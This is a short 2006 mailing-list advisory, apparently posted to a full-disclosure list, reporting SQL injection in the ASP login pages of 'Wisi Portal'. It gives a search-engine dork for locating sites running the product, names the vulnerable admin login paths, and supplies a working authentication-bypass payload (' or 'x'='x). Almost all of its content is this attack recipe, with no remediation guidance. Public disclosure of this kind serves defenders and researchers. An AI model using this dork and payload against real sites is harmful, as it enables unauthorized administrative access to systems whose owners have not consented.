Wisi Portal [Sql Injection By Jesus Tovar]
Date: 25 Nov 2006 02:31:55 -0000
From: [email protected]
To: [email protected]
Subject: Wisi Portal [Sql Injection By Jesus Tovar]
X-Virus-Scanned: antivirus-gw at tyumen.ru
######################
##By: Jesus Tovar
##mail: [email protected]
##Greetz: Dario Struz
##Vendor: http://www.wsicorporate.com
##Digital Security Owner
####################################
Dork: "Created and maintained by WSI"
File Bug: /login.asp
/admin/login.asp
/admin/request.asp
Sql Injection :
' or 'x'='x
Site Examples:
http://host.com/admin/login.asp
/default.asp
/request.asp
